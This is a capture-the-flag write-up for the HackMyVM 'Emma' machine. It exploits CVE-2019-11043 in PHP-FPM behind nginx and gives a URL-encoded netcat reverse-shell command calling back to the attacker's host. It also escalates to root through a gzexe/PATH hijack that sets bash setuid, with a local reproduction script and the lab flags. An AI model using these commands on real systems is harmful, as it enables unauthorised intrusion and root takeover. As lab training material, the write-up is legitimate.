[hackmyvm] Emma machine writeup


tags:

  • HMV
  • PATH (environment variable) hijacking for privilege escalation
  • CVE-2019-11043

1. Basic info

Contents

    • [1. Basic info](#1. Basic info)
    • [2. Information gathering](#2. Information gathering)
    • [3. Exploiting via phpinfo](#3. Exploiting via phpinfo)
    • [4. Privilege escalation: www-data to emma](#4. Privilege escalation: www-data to emma)
    • [5. Privilege escalation: emma to root](#5. Privilege escalation: emma to root)
      • [5.1. Abusing gzexe: hijacking gzip](#5.1. Abusing gzexe: hijacking gzip)

Machine: https://hackmyvm.eu/machines/machine.php?vm=Emma
Author: Emma
Difficulty: ⭐️⭐️⭐️⭐️

2. Information gathering

```bash
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# nmap -sCV 192.168.200.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 12:02 CST
Nmap scan report for chimichurri.thl (192.168.200.4)
Host is up (0.000090s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 4a:4c:af:92:cc:bb:99:59:d7:2f:1b:99:fb:f1:7c:f0 (RSA)
|   256 ba:0d:85:69:43:86:c1:91:7c:db:2a:1e:34:ab:68:1e (ECDSA)
|_  256 a1:ac:2c:ce:f4:07:da:96:12:74:d1:54:9e:f7:09:04 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:64:B9:B4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.62 seconds

┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# nmap 192.168.200.4 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 12:02 CST
Nmap scan report for chimichurri.thl (192.168.200.4)
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:64:B9:B4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.65 seconds
```

Only SSH and HTTP are exposed, and the full-port scan confirms nothing else is listening externally.

Home page

```bash
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# curl http://192.168.200.4
```

Empty response.

Directory scan

```bash
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# dirsearch -u http://192.168.200.4
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/hmv/emma/reports/http_192.168.200.4/_24-12-04_12-05-14.txt

Target: http://192.168.200.4/

[12:05:14] Starting:
[12:05:29] 200 -   58KB - /phpinfo.php
[12:05:31] 200 -   15B  - /robots.txt


┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# curl http://192.168.200.4/robots.txt
itwasonlyakiss
```

We get one key string, itwasonlyakiss. It could be a password or a username; keep it for later.

3. Exploiting via phpinfo

The box hands us phpinfo.php (found by dirsearch above), which leaks the full PHP build and configuration.

Guess: this is pointing us at a known CVE.

Check the PHP version in phpinfo.

Version: 7.1.33dev. The 7.1 branch was only patched in 7.1.33 (7.2.24 and 7.3.11 for the other branches), so this build is in range.

Found an RCE: CVE-2019-11043 (PHP-FPM behind nginx). A %0a in the request path makes the usual `fastcgi_split_path_info ^(.+?\.php)(/.*)$` regex yield an empty PATH_INFO, which triggers a pointer underflow in the FPM worker; the public exploit turns that into php.ini injection and from there into command execution. Besides upgrading PHP, the server-side mitigation is `try_files $uri =404;` in the PHP location so nginx never forwards requests for scripts that do not exist.

https://blog.csdn.net/qq_42133828/article/details/102868522

Exploit project: github.com/neex/phuip-fpizdam

Set up the environment

```bash
apt-get install golang
# `go get` no longer installs binaries on Go 1.18+; use `go install` with a version suffix
go install github.com/neex/phuip-fpizdam@latest
export PATH=$PATH:$(go env GOPATH)/bin
```

Run the exploit (note: the lab address changes between the captures below, 192.168.42.x instead of the 192.168.200.4 used above; it is the same box)

```bash
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# phuip-fpizdam http://192.168.42.43/index.php
2024/12/04 12:39:32 Base status code is 200
2024/12/04 12:39:32 Status code 502 for qsl=1765, adding as a candidate
2024/12/04 12:39:32 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2024/12/04 12:39:32 Attack params found: --qsl 1755 --pisos 23 --skip-detect
2024/12/04 12:39:32 Trying to set "session.auto_start=0"...
2024/12/04 12:39:32 Detect() returned attack params: --qsl 1755 --pisos 23 --skip-detect <-- REMEMBER THIS
2024/12/04 12:39:32 Performing attack using php.ini settings...
2024/12/04 12:39:33 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2024/12/04 12:39:33 Trying to cleanup /tmp/a...
2024/12/04 12:39:33 Done!
```

The tool prints the parameters it detected for a reason: PHP-FPM runs several workers and only the poisoned one executes commands, so if it gets recycled the attack can be re-run with `--qsl 1755 --pisos 23 --skip-detect` without repeating detection, and a command request may need to be sent more than once before it lands on the poisoned worker.

Reverse shell

```bash
# payload: id;nc -e /bin/bash 192.168.42.39 1234   (URL-encoded in the query below)
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# curl http://192.168.42.115/index.php/?a=/bin/sh+-c+%27id%3Bnc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201234%20%27

┌──(pwncat-env)─(root㉿kali)-[~]
└─# pwncat-cs -lp 1234
[12:41:29] Welcome to pwncat 🐈!                                                                       __main__.py:164
[12:50:54] received connection from 192.168.42.115:55396                                                    bind.py:84
[12:50:55] 192.168.42.115:55396: registered new host w/ db                                              manager.py:957
(local) pwncat$
(remote) www-data@emma:/var/www/html$ whoami
www-data
(remote) www-data@emma:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@emma:/var/www/html$
```

4. Privilege escalation: www-data to emma

SUID scan first. Everything listed is stock Debian except /home/emma/who, which we come back to in section 5.

```bash
(remote) www-data@emma:/var/www/html$ find / -perm /4000 2>/dev/null
/home/emma/who
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/mount
```

Inside the box, port 3306 is listening. It was not in the external full-port scan (only 22 and 80), so the database is bound locally and only reachable from our shell.

Let's look at the database.

The database root password is the string from robots.txt, itwasonlyakiss.

```bash
(remote) www-data@emma:/etc$ mysql -uroot -pitwasonlyakiss
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 13
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| users              |
+--------------------+
4 rows in set (0.012 sec)

MariaDB [(none)]> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [users]> show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.000 sec)

MariaDB [users]> select * from users;
+----+------+----------------------------------+
| id | user | pass                             |
+----+------+----------------------------------+
|  1 | emma | 5f4dcc3b5aa765d61d8327deb882cf80 |
+----+------+----------------------------------+
1 row in set (0.000 sec)
```

5. Privilege escalation: emma to root

There is a trap here. emma's password is not the plaintext behind that hash, it is the md5 string itself. 5f4dcc3b5aa765d61d8327deb882cf80 is md5("password"), so cracking it is a dead end; su accepts the 32-character hash string. Once in, flag.sh prints the user flag banner.

```bash
(remote) www-data@emma:/etc$ su emma
Password:  5f4dcc3b5aa765d61d8327deb882cf80
emma@emma:/etc$

emma@emma:~$ sh flag.sh

                                   .     **
                                *           *.
                                              ,*
                                                 *,
                         ,                         ,*
                      .,                              *,
                    /                                    *
                 ,*                                        *,
               /.                                            .*.
             *                                                  **
             ,*                                               ,*
                **                                          *.
                   **                                    **.
                     ,*                                **
                        *,                          ,*
                           *                      **
                             *,                .*
                                *.           **
                                  **      ,*,
                                     ** *,
-------------------------

PWNED HOST: emma

PWNED DATE: Wed 04 Dec 2024 12:16:48 AM EST

WHOAMI: uid=1000(emma) gid=1000(emma) groups=1000(emma),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

FLAG: youdontknowme

------------------------
```
```bash
emma@emma:~$ sudo -l
Matching Defaults entries for emma on emma:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User emma may run the following commands on emma:
    (ALL : ALL) NOPASSWD: /usr/bin/gzexe
```

We can run gzexe as root, without a password.

5.1. Abusing gzexe: hijacking gzip

gzexe is a shell script that compresses an executable in place. The file keeps its name and stays executable (the original is kept alongside as name~), and when the compressed file is run, the stub it now starts with calls `gzip -cd` to decompress the payload into a temporary file and execute it.

The stub calls gzip by bare name, so whoever runs the compressed file resolves gzip through their own PATH. That is the hijack: put our own gzip first in PATH.

For this to escalate, though, gzip has to be invoked as root. sudo alone does not get us there: the Defaults above set env_reset and secure_path, so `sudo gzexe` itself runs with a clean PATH and compresses using the real gzip. The hijack has to fire when the compressed file is executed, not when it is created.

Once A has been compressed with gzexe, executing A triggers gzip.

So the key question is which A to compress.

A must be something that gets executed with root privileges while our PATH is still in effect.

```bash
emma@emma:~$ cat who.c
#include <stdio.h>
#include <stdlib.h>
void main(){
setuid(0);
setgid(0);
printf("Im \n");
system("/bin/id");
setuid(1000);
setgid(1000);
printf("But now Im \n");
system("/bin/id");
}

emma@emma:~$ ls -la
total 64
drwxr-xr-x 4 emma emma  4096 Dec  4 00:14 .
drwxr-xr-x 3 root root  4096 Feb  4  2021 ..
-rw-r--r-- 1 emma emma   220 Feb  4  2021 .bash_logout
-rw-r--r-- 1 emma emma  3526 Feb  4  2021 .bashrc
-rwx------ 1 emma emma  1920 Feb  4  2021 flag.sh
drwx------ 3 emma emma  4096 Dec  4 00:14 .gnupg
drwxr-xr-x 3 emma emma  4096 Feb  4  2021 .local
-rw-r--r-- 1 emma emma   807 Feb  4  2021 .profile
-rw------- 1 emma emma    14 Feb  4  2021 user.txt
-rwsr-s--- 1 root emma 16760 Feb  4  2021 who
-rw-r--r-- 1 emma emma   185 Feb  4  2021 who.c
-rw------- 1 emma emma    50 Feb  4  2021 .Xauthority
```

who is setuid and setgid root and executable by group emma, so we can run it. who.c shows it calls /bin/id twice through system(): once after setuid(0), as root, and once after dropping back to uid 1000.

system() runs the command through /bin/sh -c and inherits the caller's environment, PATH included. The first call is therefore a root process that will happily run whatever /bin/id has become.

So: compress /bin/id with gzexe (as root, via sudo), put our gzip in front of PATH, and run who. The root-privileged system("/bin/id") executes the gzexe stub, the stub runs gzip from our PATH, and our fake gzip runs as root.

```bash
# hijack gzip through PATH
echo 'chmod +s /bin/bash' > /tmp/gzip
chmod +x /tmp/gzip
export PATH=/tmp:$PATH

# compress /bin/id with gzexe: must be run through sudo, /bin is not writable by emma
# (gzexe keeps the original as /bin/id~)
sudo /usr/bin/gzexe /bin/id

# run who to trigger gzip as root, then spawn a privileged bash
./who
bash -p

# once root, put the real binary back so id keeps working: mv /bin/id~ /bin/id
```
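To see the mechanism without a setuid binary or sudo, the following added example (not from the writeup) reproduces the chain in a scratch directory: a stand-in for /bin/id is rewritten into a gzexe-style stub, an attacker gzip is placed first in PATH, and a stand-in for who runs the victim by absolute path with the caller's environment, exactly what system("/bin/id") does. The stub is a condensed version of the wrapper gzexe(1) writes; its decompression step is the same `tail ... | gzip -cd`, with gzip resolved through PATH. Paths under $WORK and the marker file are constructed for the demo; on the box the marker line is where `chmod +s /bin/bash` goes and the caller is root.

```shell
#!/bin/sh
# Added example: local, root-free reproduction of the gzexe PATH hijack.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
export TMPDIR="$WORK"               # the stub's mktemp lands inside the scratch dir
export MARKER="$WORK/hijacked"      # written by the fake gzip so the test can see it ran

# Victim executable standing in for /bin/id.
printf '#!/bin/sh\necho "uid=0(root)"\n' > "$WORK/id"
chmod +x "$WORK/id"

# Rewrite an executable in place the way gzexe does: keep the original as NAME~, replace NAME
# with a sh stub that carries the gzip'd payload after its own lines and runs `gzip -cd` on it.
# (Real gzexe stubs are longer; this keeps only the lines that matter for the hijack.)
wrap_like_gzexe() {
  f=$1
  {
    printf '#!/bin/sh\n'
    printf 'skip=5\n'
    printf 'tmp=$(mktemp) || exit 1\n'
    printf 'tail -n +$skip "$0" | gzip -cd > "$tmp" && chmod 700 "$tmp" && "$tmp" "$@"; r=$?; rm -f "$tmp"; exit $r\n'
    gzip -c "$f"
  } > "$f.tmp"
  mv "$f" "$f~"
  mv "$f.tmp" "$f"
  chmod +x "$f"
}
wrap_like_gzexe "$WORK/id"

# Attacker-controlled gzip, to be placed ahead of the real one in PATH.
# On the box this script is `chmod +s /bin/bash`; here it records which user ran it.
mkdir "$WORK/evil"
printf '#!/bin/sh\necho ran-as-$(id -un) > "$MARKER"\n' > "$WORK/evil/gzip"
chmod +x "$WORK/evil/gzip"

# Stand-in for ./who: run the victim by absolute path with the caller's environment.
run_clean() {                       # normal PATH: the stub decompresses and runs the real payload
  rm -f "$MARKER"
  "$WORK/id"
}
run_hijacked() {                    # attacker dir first in PATH: the stub runs our gzip instead
  rm -f "$MARKER"
  PATH="$WORK/evil:$PATH" "$WORK/id" >/dev/null 2>&1 || true
  cat "$MARKER" 2>/dev/null || echo "not hijacked"
}

run_clean        # prints uid=0(root): the wrapped file still works, which is why nobody notices
run_hijacked     # prints ran-as-<you>; with a setuid root caller this is root
```

Two details carry over to the real box: the wrapped binary keeps working when PATH is clean (so the hijack is silent until the privileged caller runs it), and the privilege comes entirely from the caller, not from sudo, which is why `sudo gzexe` with env_reset and secure_path is not itself the escalation.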
```bash
bash-5.0# cat /root/root.txt
itsmeimshe
bash-5.0# cat /home/emma/user.txt
youdontknowme
```